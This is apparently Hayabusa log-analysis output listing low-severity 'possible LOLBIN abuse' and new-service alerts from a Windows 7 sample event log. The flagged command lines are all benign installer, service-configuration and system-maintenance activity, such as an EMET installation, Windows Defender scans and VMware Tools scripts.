8052016-09-02 05:06:54.679 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{86D5EB8A-859F-4C7B-A76B-2BD819B7A850} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8062016-09-02 05:39:28.543 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x12e8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8072016-09-02 05:39:28.691 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\eventvwr.exe" /l:"C:\Users\IEUser\Documents\511-evtx\applocker.evtx" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x11e0 | User: IEUser | LID: 0x4d011rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8082016-09-02 05:39:28.743 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa28 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8092016-09-02 05:39:28.761 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17a4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8102016-09-02 05:39:28.771 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\eventvwr.exe" /l:"C:\Users\IEUser\Documents\511-evtx\applocker.evtx" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xd08 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8112016-09-02 05:39:28.809 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /l:"C:\Users\IEUser\Documents\511-evtx\applocker.evtx" | Path: C:\Windows\System32\mmc.exe | PID: 0xebc | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8122016-09-02 05:46:10.436 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1158 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8132016-09-02 05:46:27.488 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\System32\msiexec.exe" /i "C:\Users\IEUser\Downloads\EMET Setup (1).msi" | Path: C:\Windows\System32\msiexec.exe | PID: 0x14c8 | User: IEUser | LID: 0x4d011rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8142016-09-02 05:46:27.704 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x2ec | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8152016-09-02 05:47:09.257 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc48 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8162016-09-02 05:47:09.370 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x16bc | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8172016-09-02 05:48:01.641 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\MsiExec.exe -Embedding 29CF125E202451A4ADA81BD9D0C1A3B7 | Path: C:\Windows\System32\msiexec.exe | PID: 0x6f0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8182016-09-02 05:48:09.250 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\MsiExec.exe -Embedding 22A181542763035A5FF1244203DB5EDC E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xe70 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8192016-09-02 05:48:18.846 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0xa48 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8202016-09-02 05:48:20.301 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: sidtype NetTcpPortSharing restricted | Path: C:\Windows\System32\sc.exe | PID: 0x13e8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8212016-09-02 05:48:20.346 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: privs NetTcpPortSharing SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x12c0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8222016-09-02 05:48:20.355 +09:00IE10Win77045infoNew Service InstalledName: Net.Tcp Listener Adapter | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe | Account: NT AUTHORITY\LocalService | Start Type: disabledrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8232016-09-02 05:48:20.366 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: sidtype NetTcpActivator restricted | Path: C:\Windows\System32\sc.exe | PID: 0x9e4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8242016-09-02 05:48:20.379 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: privs NetTcpActivator SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x1558 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8252016-09-02 05:48:20.416 +09:00IE10Win77045infoNew Service InstalledName: Net.Pipe Listener Adapter | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe | Account: NT AUTHORITY\LocalService | Start Type: disabledrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8262016-09-02 05:48:20.426 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: sidtype NetPipeActivator restricted | Path: C:\Windows\System32\sc.exe | PID: 0x1660 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8272016-09-02 05:48:20.439 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: privs NetPipeActivator SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x1234 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8282016-09-02 05:48:20.450 +09:00IE10Win77045infoNew Service InstalledName: Net.Msmq Listener Adapter | Path: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe" -NetMsmqActivator | Account: NT AUTHORITY\NetworkService | Start Type: disabledrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8292016-09-02 05:48:20.460 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: sidtype NetMsmqActivator restricted | Path: C:\Windows\System32\sc.exe | PID: 0x968 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8302016-09-02 05:48:20.468 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: privs NetMsmqActivator SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x710 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8312016-09-02 05:48:22.723 +09:00IE10Win77045infoNew Service InstalledName: ASP.NET State Service | Path: %SystemRoot%\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe | Account: LocalSystem | Start Type: disabledrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8322016-09-02 05:49:59.321 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x128c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8332016-09-02 05:50:05.366 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\System32\msiexec.exe" /i "C:\Users\IEUser\Downloads\EMET Setup (1).msi" | Path: C:\Windows\System32\msiexec.exe | PID: 0x17e4 | User: IEUser | LID: 0x4d011rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8342016-09-02 05:50:05.541 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1570 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8352016-09-02 05:50:19.219 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\MsiExec.exe -Embedding 4DE932ADC1206E85CE03A5855ECF29FC | Path: C:\Windows\System32\msiexec.exe | PID: 0x434 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8362016-09-02 05:50:19.686 +09:00IE10Win77045infoNew Service InstalledName: Microsoft EMET Service | Path: "C:\Program Files\EMET 5.5\EMET_Service.exe" | Account: LocalSystem | Start Type: auto startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8372016-09-02 05:50:19.909 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\MsiExec.exe -Embedding 22F8D0F1805E128ED9C40EA3A4181C89 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xe78 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8382016-09-02 05:50:20.040 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\System32\reg.exe" copy hklm\software\microsoft\emet_up hklm\software\microsoft\emet /s /f | Path: C:\Windows\System32\reg.exe | PID: 0x59c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8392016-09-02 05:50:20.058 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "regsvr32.exe" /s "C:\Program Files\EMET 5.5\EMET_CE.DLL" | Path: C:\Windows\System32\regsvr32.exe | PID: 0x17d4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8402016-09-02 05:50:20.147 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\System32\reg.exe" delete hklm\software\microsoft\emet_up /f | Path: C:\Windows\System32\reg.exe | PID: 0x13d4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8412016-09-02 05:50:20.214 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\System32\reg.exe" copy hklm\software\policies\microsoft\emet_up hklm\software\policies\microsoft\emet /s /f | Path: C:\Windows\System32\reg.exe | PID: 0x17c0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8422016-09-02 05:50:20.258 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\System32\reg.exe" delete hklm\software\policies\microsoft\emet_up /f | Path: C:\Windows\System32\reg.exe | PID: 0x14cc | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8432016-09-02 05:53:20.687 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\eventvwr.exe" /l:"C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1598 | User: IEUser | LID: 0x4d011rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8442016-09-02 05:53:20.767 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa1c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8452016-09-02 05:53:20.804 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x364 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8462016-09-02 05:53:20.815 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\eventvwr.exe" /l:"C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xf94 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8472016-09-02 05:53:20.853 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /l:"C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx" | Path: C:\Windows\System32\mmc.exe | PID: 0x1628 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8482016-09-02 06:24:37.363 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x16d4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8492016-09-02 06:24:37.378 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x148c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8502016-09-02 23:08:33.005 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8512016-09-02 23:08:33.233 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x398 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8522016-09-02 23:08:33.396 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x175c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8532016-09-02 23:08:53.121 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1360 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8542016-09-02 23:10:30.765 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\wuauclt.exe" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x103c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8552016-09-02 23:46:22.988 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "c:\program files\windows defender\MpCmdRun.exe" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x1780 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8562016-09-02 23:46:23.139 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "c:\program files\windows defender\MpCmdRun.exe" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x100 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8572016-09-02 23:46:23.201 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "c:\program files\windows defender\MpCmdRun.exe" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x6f8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8582016-09-02 23:48:22.957 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x8d0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8592016-09-03 00:00:00.476 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" | Path: C:\Windows\System32\schtasks.exe | PID: 0x1698 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8602016-09-03 00:04:56.561 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\findstr.exe" xml | Path: C:\Windows\System32\findstr.exe | PID: 0x16ac | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8612016-09-03 00:05:21.063 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\findstr.exe" xml | Path: C:\Windows\System32\findstr.exe | PID: 0x994 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8622016-09-03 00:12:14.714 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\eventvwr.exe" .\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\eventvwr.exe | PID: 0x13a0 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8632016-09-03 00:12:14.738 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /COMPUTER:.\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\mmc.exe | PID: 0x10f4 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8642016-09-03 00:12:39.238 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6f8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8652016-09-03 00:12:39.356 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\eventvwr.exe" /l:"C:\Users\IEUser\Documents\511-evtx\511-5-system.evtx" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xcb4 | User: IEUser | LID: 0x4d011rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8662016-09-03 00:12:39.409 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14c0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
